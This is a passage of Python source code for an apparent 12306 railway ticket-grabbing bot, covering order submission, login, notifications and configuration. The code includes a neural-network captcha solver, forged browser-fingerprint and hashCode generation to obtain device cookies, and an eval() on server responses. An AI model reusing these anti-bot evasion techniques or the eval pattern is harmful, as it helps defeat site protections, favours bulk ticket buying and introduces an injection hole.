+= 1 now = datetime.datetime.now() # 感谢群里大佬提供整点代码 configCommon.checkSleepTime(self) # 晚上到点休眠 q = query(selectObj=self, from_station=from_station, to_station=to_station, from_station_h=TickerConfig.FROM_STATION, to_station_h=TickerConfig.TO_STATION, _station_seat=self._station_seat, station_trains=TickerConfig.STATION_TRAINS, station_dates=TickerConfig.STATION_DATES, ticke_peoples_num=len(TickerConfig.TICKET_PEOPLES), ) queryResult = q.sendQuery() # 查询接口 if queryResult.get("status"): train_no = queryResult.get("train_no", "") train_date = queryResult.get("train_date", "") stationTrainCode = queryResult.get("stationTrainCode", "") secretStr = queryResult.get("secretStr", "") secretList = queryResult.get("secretList", "") seat = queryResult.get("seat", "") leftTicket = queryResult.get("leftTicket", "") query_from_station_name = queryResult.get("query_from_station_name", "") query_to_station_name = queryResult.get("query_to_station_name", "") is_more_ticket_num = queryResult.get("is_more_ticket_num", len(TickerConfig.TICKET_PEOPLES)) if wrapcache.get(train_no): print(ticket.QUEUE_WARNING_MSG.format(train_no)) else: # 获取联系人 s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES, set_type="" if isinstance(seat, list) else seat_conf_2[seat], # 候补订单需要设置多个坐席 is_more_ticket_num=is_more_ticket_num) getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr(secretStr, secretList) if getPassengerDTOsResult.get("status", False): self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "") self.passengerTicketStrByAfterLate = getPassengerDTOsResult.get( "passengerTicketStrByAfterLate", "") self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "") self.set_type = getPassengerDTOsResult.get("set_type", "") # 提交订单 # 订单分为两种,一种为抢单,一种为候补订单 if secretStr: # 正常下单 if TickerConfig.ORDER_TYPE == 1: # 快速下单 a = autoSubmitOrderRequest(selectObj=self, secretStr=secretStr, train_date=train_date, passengerTicketStr=self.passengerTicketStrList, oldPassengerStr=self.oldPassengerStr, train_no=train_no, stationTrainCode=stationTrainCode, leftTicket=leftTicket, set_type=self.set_type, query_from_station_name=query_from_station_name, query_to_station_name=query_to_station_name, ) a.sendAutoSubmitOrderRequest() elif TickerConfig.ORDER_TYPE == 2: # 普通下单 sor = submitOrderRequest(self, secretStr, from_station, to_station, train_no, self.set_type, self.passengerTicketStrList, self.oldPassengerStr, train_date, TickerConfig.TICKET_PEOPLES) sor.sendSubmitOrderRequest() elif secretList: # 候补订单 c = chechFace(self, secretList, train_no) c.sendChechFace() else: random_time = round(random.uniform(sleep_time_s, sleep_time_t), 2) nateMsg = ' 无候补机会' if TickerConfig.ORDER_TYPE == 2 else "" print(f"正在第{num}次查询 停留时间:{random_time} 乘车日期: {','.join(TickerConfig.STATION_DATES)} 车次:{','.join(TickerConfig.STATION_TRAINS) or '所有车次'} 下单无票{nateMsg} 耗时:{(datetime.datetime.now() - now).microseconds / 1000} {queryResult.get('cdn')}") time.sleep(random_time) except PassengerUserException as e: print(e) break except ticketConfigException as e: print(e) break except ticketIsExitsException as e: print(e) break except ticketNumOutException as e: print(e) break except UserPasswordException as e: print(e) break except ValueError as e: if e == "No JSON object could be decoded": print(u"12306接口无响应,正在重试") else: print(e) except KeyError as e: print(e) except TypeError as e: print(u"12306接口无响应,正在重试 {0}".format(e)) except socket.error as e: print(e) if __name__ == '__main__': s = select() cdn = s.station_table("长沙", "深圳") File: init/login.py # -*- coding=utf-8 -*- import copy import time from collections import OrderedDict from time import sleep import TickerConfig from inter.GetPassCodeNewOrderAndLogin import getPassCodeNewOrderAndLogin1 from inter.GetRandCode import getRandCode from inter.LoginAysnSuggest import loginAysnSuggest from inter.LoginConf import loginConf from myException.UserPasswordException import UserPasswordException class GoLogin: def __init__(self, session, is_auto_code, auto_code_type): self.session = session self.randCode = "" self.is_auto_code = is_auto_code self.auto_code_type = auto_code_type def auth(self): """ :return: """ self.session.httpClint.send(self.session.urls["loginInitCdn1"]) uamtkStaticUrl = self.session.urls["uamtk-static"] uamtkStaticData = {"appid": "otn"} return self.session.httpClint.send(uamtkStaticUrl, uamtkStaticData) def codeCheck(self): """ 验证码校验 :return: """ codeCheckUrl = copy.deepcopy(self.session.urls["codeCheck1"]) codeCheckUrl["req_url"] = codeCheckUrl["req_url"].format(self.randCode, int(time.time() * 1000)) fresult = self.session.httpClint.send(codeCheckUrl) if not isinstance(fresult, str): print("登录失败") return fresult = eval(fresult.split("(")[1].split(")")[0]) if "result_code" in fresult and fresult["result_code"] == "4": print(u"验证码通过,开始登录..") return True else: if "result_message" in fresult: print(fresult["result_message"]) sleep(1) self.session.httpClint.del_cookies() def baseLogin(self, user, passwd): """ 登录过程 :param user: :param passwd: :return: 权限校验码 """ logurl = self.session.urls["login"] loginData = OrderedDict() loginData["username"] = user, loginData["password"] = passwd, loginData["appid"] = "otn", loginData["answer"] = self.randCode, tresult = self.session.httpClint.send(logurl, loginData) if 'result_code' in tresult and tresult["result_code"] == 0: print(u"登录成功") tk = self.auth() if "newapptk" in tk and tk["newapptk"]: return tk["newapptk"] else: return False elif 'result_message' in tresult and tresult['result_message']: messages = tresult['result_message'] if messages.find(u"密码输入错误") is not -1: raise UserPasswordException("{0}".format(messages)) else: print(u"登录失败: {0}".format(messages)) print(u"尝试重新登陆") return False else: return False def getUserName(self, uamtk): """ 登录成功后,显示用户名 :return: """ if not uamtk: return u"权限校验码不能为空" else: uamauthclientUrl = self.session.urls["uamauthclient"] data = {"tk": uamtk} uamauthclientResult = self.session.httpClint.send(uamauthclientUrl, data) if uamauthclientResult: if "result_code" in uamauthclientResult and uamauthclientResult["result_code"] == 0: print(u"欢迎 {} 登录".format(uamauthclientResult["username"])) return True else: return False else: self.session.httpClint.send(uamauthclientUrl, data) url = self.session.urls["getUserInfo"] self.session.httpClint.send(url) def go_login(self): """ 登陆 :param user: 账户名 :param passwd: 密码 :return: """ user, passwd = TickerConfig.USER, TickerConfig.PWD if not user or not passwd: raise UserPasswordException(u"温馨提示: 用户名或者密码为空,请仔细检查") login_num = 0 while True: if loginConf(self.session): result = getPassCodeNewOrderAndLogin1(session=self.session, imgType="login") if not result: continue self.randCode = getRandCode(self.is_auto_code, self.auto_code_type, result) print(self.randCode) login_num += 1 self.auth() if self.codeCheck(): uamtk = self.baseLogin(user, passwd) if uamtk: self.getUserName(uamtk) break else: loginAysnSuggest(self.session, username=user, password=passwd) login_num += 1 break File: verify/mlearn_for_image.py # coding: utf-8 import TickerConfig if TickerConfig.AUTO_CODE_TYPE == 2: import sys import cv2 import numpy as np from keras import models from keras import layers from keras import optimizers from keras.applications import VGG16 from keras.callbacks import ReduceLROnPlateau from keras.preprocessing.image import ImageDataGenerator def preprocess_input(x): x = x.astype('float32') # 我是用cv2来读取的图片,其已经是BGR格式了 mean = [103.939, 116.779, 123.68] x -= mean return x def load_data(): # 这是统计学专家提供的训练集 data = np.load('captcha.npz') train_x, train_y = data['images'], data['labels'] train_x = preprocess_input(train_x) # 由于是统计得来的信息,所以在此给定可信度 sample_weight = train_y.max(axis=1) / np.sqrt(train_y.sum(axis=1)) sample_weight /= sample_weight.mean() train_y = train_y.argmax(axis=1) # 这是人工提供的验证集 data = np.load('captcha.test.npz') test_x, test_y = data['images'], data['labels'] test_x = preprocess_input(test_x) return (train_x, train_y, sample_weight), (test_x, test_y) def learn(): (train_x, train_y, sample_weight), (test_x, test_y) = load_data() datagen = ImageDataGenerator(horizontal_flip=True, vertical_flip=True) train_generator = datagen.flow(train_x, train_y, sample_weight=sample_weight) base = VGG16(weights='imagenet', include_top=False, input_shape=(None, None, 3)) for layer in base.layers[:-4]: layer.trainable = False model = models.Sequential([ base, layers.BatchNormalization(), layers.Conv2D(64, (3, 3), activation='relu', padding='same'), layers.GlobalAveragePooling2D(), layers.BatchNormalization(), layers.Dense(64, activation='relu'), layers.BatchNormalization(), layers.Dropout(0.20), layers.Dense(80, activation='softmax') ]) model.compile(optimizer=optimizers.RMSprop(lr=1e-5), loss='sparse_categorical_crossentropy', metrics=['accuracy']) model.summary() reduce_lr = ReduceLROnPlateau(verbose=1) model.fit_generator(train_generator, epochs=400, steps_per_epoch=100, validation_data=(test_x[:800], test_y[:800]), callbacks=[reduce_lr]) result = model.evaluate(test_x, test_y) print(result) model.save('12306.image.model.h5', include_optimizer=False) def predict(imgs): imgs = preprocess_input(imgs) model = models.load_model('12306.image.model.h5') labels = model.predict(imgs) return labels def _predict(fn): imgs = cv2.imread(fn) imgs = cv2.resize(imgs, (67, 67)) imgs.shape = (-1, 67, 67, 3) labels = predict(imgs) print(labels.max(axis=1)) print(labels.argmax(axis=1)) if __name__ == '__main__': if len(sys.argv) >= 2: _predict(sys.argv[1]) else: learn() File: verify/pretreatment.py #! env python # coding: utf-8 # 功能:对图像进行预处理,将文字部分单独提取出来 # 并存放到ocr目录下 # 文件名为原验证码文件的文件名 import TickerConfig if TickerConfig.AUTO_CODE_TYPE == 2: import hashlib import os import pathlib import cv2 import numpy as np import requests import scipy.fftpack PATH = 'imgs' def download_image(): # 抓取验证码 # 存放到指定path下 # 文件名为图像的MD5 url = 'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand' r = requests.get(url) fn = hashlib.md5(r.content).hexdigest() with open(f'{PATH}/{fn}.jpg', 'wb') as fp: fp.write(r.content) def download_images(): pathlib.Path(PATH).mkdir(exist_ok=True) for idx in range(40000): download_image() print(idx) def get_text(img, offset=0): # 得到图像中的文本部分 return img[3:22, 120 + offset:177 + offset] def avhash(im): im = cv2.resize(im, (8, 8), interpolation=cv2.INTER_CUBIC) avg = im.mean() im = im > avg im = np.packbits(im) return im def phash(im): im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC) im = scipy.fftpack.dct(scipy.fftpack.dct(im, axis=0), axis=1) im = im[:8, :8] med = np.median(im) im = im > med im = np.packbits(im) return im def _get_imgs(img): interval = 5 length = 67 for x in range(40, img.shape[0] - length, interval + length): for y in range(interval, img.shape[1] - length, interval + length): yield img[x:x + length, y:y + length] def get_imgs(img): imgs = [] for img in _get_imgs(img): imgs.append(phash(img)) return imgs def pretreat(): if not os.path.isdir(PATH): download_images() texts, imgs = [], [] for img in os.listdir(PATH): img = os.path.join(PATH, img) img = cv2.imread(img, cv2.IMREAD_GRAYSCALE) texts.append(get_text(img)) imgs.append(get_imgs(img)) return texts, imgs def load_data(path='data.npz'): if not os.path.isfile(path): texts, imgs = pretreat() np.savez(path, texts=texts, images=imgs) f = np.load(path) return f['texts'], f['images'] if __name__ == '__main__': texts, imgs = load_data() print(texts.shape) print(imgs.shape) imgs = imgs.reshape(-1, 8) print(np.unique(imgs, axis=0).shape) File: verify/__init__.py File: verify/localVerifyCode.py # coding: utf-8 import TickerConfig if TickerConfig.AUTO_CODE_TYPE == 2: import base64 import os import cv2 import numpy as np from keras import models, backend import tensorflow as tf from verify import pretreatment from verify.mlearn_for_image import preprocess_input graph = tf.get_default_graph() PATH = lambda p: os.path.abspath( os.path.join(os.path.dirname(__file__), p) ) TEXT_MODEL = "" IMG_MODEL = "" def get_text(img, offset=0): text = pretreatment.get_text(img, offset) text = cv2.cvtColor(text, cv2.COLOR_BGR2GRAY) text = text / 255.0 h, w = text.shape text.shape = (1, h, w, 1) return text def base64_to_image(base64_code): # base64解码 img_data = base64.b64decode(base64_code) # 转换为np数组 img_array = np.fromstring(img_data, np.uint8) # 转换成opencv可用格式 img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR) return img class Verify: def __init__(self): self.textModel = "" self.imgModel = "" self.loadImgModel() self.loadTextModel() def loadTextModel(self): if not self.textModel: self.textModel = models.load_model(PATH('../model.v2.0.h5')) else: print("无需加载模型model.v2.0.h5") def loadImgModel(self): if not self.imgModel: self.imgModel = models.load_model(PATH('../12306.image.model.h5')) def verify(self, fn): verify_titles = ['打字机', '调色板', '跑步机', '毛线', '老虎', '安全帽', '沙包', '盘子', '本子', '药片', '双面胶', '龙舟', '红酒', '拖把', '卷尺', '海苔', '红豆', '黑板', '热水袋', '烛台', '钟表', '路灯', '沙拉', '海报', '公交卡', '樱桃', '创可贴', '牌坊', '苍蝇拍', '高压锅', '电线', '网球拍', '海鸥', '风铃', '订书机', '冰箱', '话梅', '排风机', '锅铲', '绿豆', '航母', '电子秤', '红枣', '金字塔', '鞭炮', '菠萝', '开瓶器', '电饭煲', '仪表盘', '棉棒', '篮球', '狮子', '蚂蚁', '蜡烛', '茶盅', '印章', '茶几', '啤酒', '档案袋', '挂钟', '刺绣', '铃铛', '护腕', '手掌印', '锦旗', '文具盒', '辣椒酱', '耳塞', '中国结', '蜥蜴', '剪纸', '漏斗', '锣', '蒸笼', '珊瑚', '雨靴', '薯条', '蜜蜂', '日历', '口哨'] # 读取并预处理验证码 img = base64_to_image(fn) text = get_text(img) imgs = np.array(list(pretreatment._get_imgs(img))) imgs = preprocess_input(imgs) text_list = [] # 识别文字 self.loadTextModel() global graph with graph.as_default(): label = self.textModel.predict(text) label = label.argmax() text = verify_titles[label] text_list.append(text) # 获取下一个词 # 根据第一个词的长度来定位第二个词的位置 if len(text) == 1: offset = 27 elif len(text) == 2: offset = 47 else: offset = 60 text = get_text(img, offset=offset) if text.mean() < 0.95: with graph.as_default(): label = self.textModel.predict(text) label = label.argmax() text = verify_titles[label] text_list.append(text) print("题目为{}".format(text_list)) # 加载图片分类器 self.loadImgModel() with graph.as_default(): labels = self.imgModel.predict(imgs) labels = labels.argmax(axis=1) results = [] for pos, label in enumerate(labels): l = verify_titles[label] print(pos + 1, l) if l in text_list: results.append(str(pos + 1)) return results if __name__ == '__main__': pass # verify("verify-img1.jpeg") File: config/emailConf.py # -*- coding: utf8 -*- import socket __author__ = 'MR.wen' import TickerConfig from email.header import Header from email.mime.text import MIMEText import smtplib def sendEmail(msg): """ 邮件通知 :param str: email content :return: """ try: if TickerConfig.EMAIL_CONF["IS_MAIL"]: sender = TickerConfig.EMAIL_CONF["email"] receiver = TickerConfig.EMAIL_CONF["notice_email_list"] subject = '恭喜,您已订票成功' username = TickerConfig.EMAIL_CONF["username"] password = TickerConfig.EMAIL_CONF["password"] host = TickerConfig.EMAIL_CONF["host"] s = "{0}".format(msg) msg = MIMEText(s, 'plain', 'utf-8') # 中文需参数‘utf-8’,单字节字符不需要 msg['Subject'] = Header(subject, 'utf-8') msg['From'] = sender msg['To'] = receiver try: smtp = smtplib.SMTP_SSL(host) smtp.connect(host) except socket.error: smtp = smtplib.SMTP() smtp.connect(host) smtp.connect(host) smtp.login(username, password) smtp.sendmail(sender, receiver.split(","), msg.as_string()) smtp.quit() print(u"邮件已通知, 请查收") except Exception as e: print(u"邮件配置有误{}".format(e)) if __name__ == '__main__': sendEmail(1) File: config/pushbearConf.py # -*- coding: utf8 -*- import TickerConfig from config.urlConf import urls from myUrllib.httpUtils import HTTPClient PUSH_BEAR_API_PATH = "https://pushbear.ftqq.com/sub" def sendPushBear(msg): """ pushBear微信通知 :param str: 通知内容 content :return: """ if TickerConfig.PUSHBEAR_CONF["is_pushbear"] and TickerConfig.PUSHBEAR_CONF["send_key"].strip() != "": try: sendPushBearUrls = urls.get("Pushbear") data = { "sendkey": TickerConfig.PUSHBEAR_CONF["send_key"].strip(), "text": "易行购票成功通知", "desp": msg } httpClint = HTTPClient(0) sendPushBeaRsp = httpClint.send(sendPushBearUrls, data=data) if sendPushBeaRsp.get("code") is 0: print(u"已下发 pushbear 微信通知, 请查收") else: print(sendPushBeaRsp) except Exception as e: print(u"pushbear 配置有误 {}".format(e)) else: pass if __name__ == '__main__': sendPushBear(1) File: config/__init__.py File: config/logger.py #coding: utf-8 import os import time import logging from config import configCommon logger = None loggerHandler = None dateStr = '' #默认拥有日期后缀 suffix = '' #除了日期外的后缀 def setSuffix(s): global suffix suffix = s def getTodayDateStr(): return time.strftime("%Y-%m-%d", time.localtime(configCommon.getNowTimestamp())) def setDateStr(s): global dateStr dateStr = s def isAnotherDay(s): global dateStr return dateStr != s def getLogFile(): global dateStr, suffix rtn = os.path.join(configCommon.getLogDir(), dateStr) if suffix: rtn += "_" + suffix return rtn + ".log" def log(msg, func = "info"): global logger if not logger: logger = logging.getLogger() logger.setLevel(logging.INFO) todayStr = getTodayDateStr() if isAnotherDay(todayStr): setDateStr(todayStr) logger.removeHandler(loggerHandler) fh = logging.FileHandler(getLogFile()) fm = logging.Formatter(u'[%(asctime)s][%(levelname)8s] --- %(message)s (%(filename)s:%(lineno)s)') fh.setFormatter(fm) logger.addHandler(fh) levels = { "debug": logger.debug, "info": logger.info, "warning": logger.warning, "error": logger.error, "critical": logger.critical } levels[func](msg) File: config/configCommon.py # -*- coding: utf-8 -*- import datetime import os import random import sys import time from myException.ticketConfigException import ticketConfigException rushRefreshMinTimeIntval = 2000 rushRefreshMaxTimeIntval = 3600000 rushRefreshTimeIntval = 100 # 最早运行时间 maxRunTime = 6 # 程序停止时间 maxRunStopTime = 23 # 可售天数 maxDate = 29 RS_SUC = 0 RS_TIMEOUT = 1 RS_JSON_ERROR = 2 RS_OTHER_ERROR = 3 seat_conf = {'商务座': 32, '一等座': 31, '二等座': 30, '特等座': 25, '软卧': 23, '硬卧': 28, '软座': 24, '硬座': 29, '无座': 26, '动卧': 33, } if sys.version_info.major == 2: seat_conf_2 = dict([(v, k) for (k, v) in seat_conf.iteritems()]) else: seat_conf_2 = dict([(v, k) for (k, v) in seat_conf.items()]) def getNowTimestamp(): return time.time() def decMakeDir(func): def handleFunc(*args, **kwargs): dirname = func(*args, **kwargs) if not os.path.exists(dirname): os.makedirs(dirname) elif not os.path.isdir(dirname): pass return dirname return func def getWorkDir(): return os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # # def fileOpen(path): # """ # 文件读取兼容2和3 # :param path: 文件读取路径 # :return: # """ # try: # with open(path, "r", ) as f: # return f # except TypeError: # with open(path, "r", ) as f: # return f @decMakeDir def getTmpDir(): return os.path.join(getWorkDir(), "tmp") @decMakeDir def getLogDir(): return os.path.join(getTmpDir(), "log") @decMakeDir def getCacheDir(): return os.path.join(getTmpDir(), "cache") @decMakeDir def getVCodeDir(): return os.path.join(getTmpDir(), "vcode") def getVCodeImageFile(imageName): return os.path.join(getVCodeDir(), imageName + ".jpg") def getCacheFile(cacheType): return os.path.join(getCacheDir(), cacheType + ".cache") def checkSleepTime(session): now = datetime.datetime.now() if now.hour >= maxRunStopTime or now.hour < maxRunTime: print(u"12306休息时间,本程序自动停止,明天早上六点将自动运行") open_time = datetime.datetime(now.year, now.month, now.day, maxRunTime) if open_time < now: open_time += datetime.timedelta(1) time.sleep((open_time - now).seconds + round(random.uniform(1, 10))) session.call_login() def checkDate(station_dates): """ 检查日期是否合法 :param station_dates: :return: """ today = datetime.datetime.now() maxDay = (today + datetime.timedelta(maxDate)).strftime("%Y-%m-%d") for station_date in station_dates[::-1]: date = datetime.datetime.strftime(datetime.datetime.strptime(station_date, "%Y-%m-%d"), "%Y-%m-%d") if date < today.strftime("%Y-%m-%d") or date > maxDay: print(u"警告:当前时间配置有小于当前时间或者大于最大时间: {}, 已自动忽略".format(station_date)) station_dates.remove(station_date) if not station_dates: print(u"当前日期设置无符合查询条件的,已被全部删除,请查证后添加!!!") raise ticketConfigException(u"当前日期设置无符合查询条件的,已被全部删除,请查证后添加!!!") else: station_dates[station_dates.index(station_date)] = date return station_dates File: config/AutoSynchroTime.py # coding=utf-8 import os import platform import ntplib import datetime def autoSynchroTime(): """ 同步北京时间,执行时候,请务必用sudo,sudo,sudo 执行,否则会报权限错误,windows打开ide或者cmd请用管理员身份 :return: """ c = ntplib.NTPClient() hosts = ['ntp1.aliyun.com', 'ntp2.aliyun.com', 'ntp3.aliyun.com', 'ntp4.aliyun.com', 'cn.pool.ntp.org'] print(u"正在同步时间,请耐心等待30秒左右,如果下面有错误发送,可以忽略!!") print(u"系统当前时间{}".format(str(datetime.datetime.now())[:22])) system = platform.system() if system == "Windows": # windows 同步时间未测试过,参考地址:https://www.jianshu.com/p/92ec15da6cc3 for host in hosts: os.popen('w32tm /register') os.popen('net start w32time') os.popen('w32tm /config /manualpeerlist:"{}" /syncfromflags:manual /reliable:yes /update'.format(host)) os.popen('ping -n 3 127.0.0.1 >nul') sin = os.popen('w32tm /resync') if sin is 0: break else: # mac同步地址,如果ntpdate未安装,brew install ntpdate linux 安装 yum install -y ntpdate for host in hosts: sin = os.popen('ntpdate {}'.format(host)) if sin is 0: break print(u"同步后时间:{}".format(str(datetime.datetime.now())[:22])) if __name__ == '__main__': autoSynchroTime() File: config/getCookie.py import json import random import re import time import os import TickerConfig from config.urlConf import urls def getDrvicesID(session): """ :return: """ print("cookie获取中") if TickerConfig.COOKIE_TYPE is 1: from selenium import webdriver cookies = [] # 解决放镜像里 DevToolsActivePort file doesn't exist的问题 options = webdriver.ChromeOptions() if os.name != 'nt' and TickerConfig.CHROME_CHROME_PATH: options = webdriver.ChromeOptions() options.binary_location = TickerConfig.CHROME_CHROME_PATH options.add_argument( '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36') options.add_argument("--no-sandbox") options.add_argument("--headless") driver = webdriver.Chrome(executable_path=TickerConfig.CHROME_PATH,chrome_options=options) driver.get("https://www.12306.cn/index/index.html") time.sleep(10) for c in driver.get_cookies(): cookie = dict() print() if c.get("name") == "RAIL_DEVICEID" or c.get("name") == "RAIL_EXPIRATION": cookie[c.get("name")] = c.get("value") cookies.append(cookie) print(f"获取cookie: {cookies}") if cookies: session.httpClint.set_cookies(cookies) session.cookies = cookies print("cookie获取完成") elif TickerConfig.COOKIE_TYPE is 2: request_device_id(session) elif TickerConfig.COOKIE_TYPE is 3: # RAIL_DEVICEID,RAIL_EXPIRATION的值打开12306官网可以获取headers-Cookies if not TickerConfig.RAIL_DEVICEID or not TickerConfig.RAIL_EXPIRATION: print("警告!!: RAIL_DEVICEID,RAIL_EXPIRATION的值为空,请手动打开12306官网可以获取headers-Cookies中的RAIL_DEVICEID,RAIL_EXPIRATION,填入配置文件中") cookies = [{ "RAIL_DEVICEID": TickerConfig.RAIL_DEVICEID, "RAIL_EXPIRATION": TickerConfig.RAIL_EXPIRATION, }] session.httpClint.set_cookies(cookies) session.cookies = cookies def request_device_id(session): """ 获取加密后的浏览器特征 ID :return: """ params = {"algID": request_alg_id(session), "timestamp": int(time.time() * 1000)} params = dict(params, **_get_hash_code_params()) response = session.httpClint.send(urls.get("getDevicesId"), params=params) if response.find('callbackFunction') >= 0: result = response[18:-2] try: result = json.loads(result) session.httpClint.set_cookies([{ 'RAIL_EXPIRATION': result.get('exp'), 'RAIL_DEVICEID': result.get('dfp'), }]) session.cookies = [{ 'RAIL_EXPIRATION': result.get('exp'), 'RAIL_DEVICEID': result.get('dfp'), }] except: return False def request_alg_id(session): response = session.httpClint.send(urls.get("GetJS")) result = re.search(r'algID\\x3d(.*?)\\x26', response) try: return result.group(1) except (IndexError, AttributeError) as e: pass return "" def _get_hash_code_params(): from collections import OrderedDict data = { 'adblock': '0', 'browserLanguage': 'en-US', 'cookieEnabled': '1', 'custID': '133', 'doNotTrack': 'unknown', 'flashVersion': '0', 'javaEnabled': '0', 'jsFonts': 'c227b88b01f5c513710d4b9f16a5ce52', 'localCode': '3232236206', 'mimeTypes': '52d67b2a5aa5e031084733d5006cc664', 'os': 'MacIntel', 'platform': 'WEB', 'plugins': 'd22ca0b81584fbea62237b14bd04c866', 'scrAvailSize': str(random.randint(500, 1000)) + 'x1920', 'srcScreenSize': '24xx1080x1920', 'storeDb': 'i1l1o1s1', 'timeZone': '-8', 'touchSupport': '99115dfb07133750ba677d055874de87', 'userAgent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.' + str( random.randint( 5000, 7000)) + '.0 Safari/537.36', 'webSmartID': 'f4e3b7b14cc647e30a6267028ad54c56', } data_trans = { 'browserVersion': 'd435', 'touchSupport': 'wNLf', 'systemLanguage': 'e6OK', 'scrWidth': 'ssI5', 'openDatabase': 'V8vl', 'scrAvailSize': 'TeRS', 'hasLiedResolution': '3neK', 'hasLiedOs': 'ci5c', 'timeZone': 'q5aJ', 'userAgent': '0aew', 'userLanguage': 'hLzX', 'jsFonts': 'EOQP', 'scrAvailHeight': '88tV', 'browserName': '-UVA', 'cookieCode': 'VySQ', 'online': '9vyE', 'scrAvailWidth': 'E-lJ', 'flashVersion': 'dzuS', 'scrDeviceXDPI': '3jCe', 'srcScreenSize': 'tOHY', 'storeDb': 'Fvje', 'doNotTrack': 'VEek', 'mimeTypes': 'jp76', 'sessionStorage': 'HVia', 'cookieEnabled': 'VPIf', 'os': 'hAqN', 'hasLiedLanguages': 'j5po', 'hasLiedBrowser': '2xC5', 'webSmartID': 'E3gR', 'appcodeName': 'qT7b', 'javaEnabled': 'yD16', 'plugins': 'ks0Q', 'appMinorVersion': 'qBVW', 'cpuClass': 'Md7A', 'indexedDb': '3sw-', 'adblock': 'FMQw', 'localCode': 'lEnu', 'browserLanguage': 'q4f3', 'scrHeight': '5Jwy', 'localStorage': 'XM7l', 'historyList': 'kU5z', 'scrColorDepth': "qmyu" } data = OrderedDict(data) d = '' params = {} for key, item in data.items(): d += key + item key = data_trans[key] if key in data_trans else key params[key] = item d_len = len(d) d_f = int(d_len / 3) if d_len % 3 == 0 else int(d_len / 3) + 1 if d_len >= 3: d = d[d_f:2 * d_f] + d[2 * d_f:d_len] + d[0: d_f] d_len = len(d) d_f = int(d_len / 3) if d_len % 3 == 0 else int(d_len / 3) + 1 if d_len >= 3: d = d[2 * d_f:d_len] + d[0: d_f] + d[1 * d_f: 2 * d_f] d = _encode_data_str_v2(d) d = _encode_data_str_v2(d) d = _encode_data_str_v2(d) data_str = _encode_string(d) params['hashCode'] = data_str return params def _encode_data_str_v2(d): b = len(d) if b % 2 == 0: return d[b // 2: b] + d[0:b // 2] else: return d[b // 2 + 1:b] + d[b // 2] + d[0:b // 2] def _encode_string(str): import hashlib import base64 result = base64.b64encode(hashlib.sha256(str.encode()).digest()).decode() return result.replace('+', '-').replace('/', '_').replace('=', '') File: config/TicketEnmu.py # coding=utf-8 from enum import Enum class ticket(object): QUERY_C = u"查询到有余票,尝试提交订单" QUERY_IN_BLACK_LIST = u"该车次{} 正在被关小黑屋,跳过此车次" SUCCESS_CODE = 000000 FAIL_CODE = 999999 AUTO_SUBMIT_ORDER_REQUEST_C = u"提交订单成功" AUTO_SUBMIT_ORDER_REQUEST_F = u"提交订单失败,重新刷票中" AUTO_SUBMIT_NEED_CODE = u"需要验证码" AUTO_SUBMIT_NOT_NEED_CODE = u"不需要验证码" TICKET_BLACK_LIST_TIME = 5 # 加入小黑屋的等待时间,默认5 min DTO_NOT_FOUND = u"未查找到常用联系人, 请查证后添加!!" DTO_NOT_IN_LIST = u"联系人不在列表中,请查证后添加!!" QUEUE_TICKET_SHORT = u"当前余票数小于乘车人数,放弃订票" QUEUE_TICKET_SUCCESS = u"排队成功, 当前余票还剩余: {0}张" QUEUE_JOIN_BLACK = u"排队发现未知错误{0},将此列车 {1}加入小黑屋" QUEUE_WARNING_MSG = u"排队异常,错误信息:{0}, 将此列车 {1}加入小黑屋" OUT_NUM = 120 # 排队请求12306的次数 WAIT_OUT_NUM = u"超出排队时间,自动放弃,正在重新刷票" WAIT_ORDER_SUCCESS = u"恭喜您订票成功,订单号为:{0}, 请立即打开浏览器登录12306,访问‘未完成订单’,在30分钟内完成支付!" WAIT_AFTER_NATE_SUCCESS = u"候补订单已完成,请立即打开浏览器登录12306,访问‘候补订单’,在30分钟内完成支付!" WAIT_ORDER_CONTINUE = u"排队等待时间预计还剩 {0} ms" WAIT_ORDER_FAIL = u"排队等待失败,错误消息:{0}" WAIT_ORDER_NUM = u"第{0}次排队中,请耐心等待" WAIT_ORDER_SUB_FAIL = u"订单提交失败!,正在重新刷票" CANCEL_ORDER_SUCCESS = u"排队超时,已为您自动取消订单,订单编号: {0}" CANCEL_ORDER_FAIL = u"排队超时,取消订单失败, 订单号{0}" REST_TIME = u"12306休息时间,本程序自动停止,明天早上6点将自动运行" REST_TIME_PAST = u"休息时间已过,重新开启检票功能" LOGIN_SESSION_FAIL = u"用户检查失败:{0},可能未登录,可能session已经失效, 正在重新登录中" File: config/serverchanConf.py # -*- coding: utf8 -*- import TickerConfig from config.urlConf import urls from myUrllib.httpUtils import HTTPClient PUSH_SERVER_CHAN_PATH = "https://sc.ftqq.com" def sendServerChan(msg): """ pushBear微信通知 :param str: 通知内容 content :return: """ if ( TickerConfig.SERVER_CHAN_CONF["is_server_chan"] and TickerConfig.SERVER_CHAN_CONF["secret"].strip() != "" ): try: secret = TickerConfig.SERVER_CHAN_CONF["secret"].strip() sendServerChanUrls = urls.get("ServerChan") sendServerChanUrls["req_url"] += f'{secret}.send' params = {"text": "易行购票成功通知", "desp": msg} httpClint = HTTPClient(0) sendServerChanRsp = httpClint.send(sendServerChanUrls, params=params) if sendServerChanRsp.get("errno") == 0: print(u"已下发 Server酱 微信通知, 请查收") else: print(sendServerChanRsp) except Exception as e: print(u"Server酱 配置有误 {}".format(e)) if __name__ == "__main__": sendServerChan(1) File: config/urlConf.py # coding=utf-8 import random import TickerConfig import time urls = { "auth": { # 登录接口 "req_url": "/passport/web/auth/uamtk", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_json": True, "is_cdn": True, }, "uamtk-static": { # 登录接口 "req_url": "/passport/web/auth/uamtk-static", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": 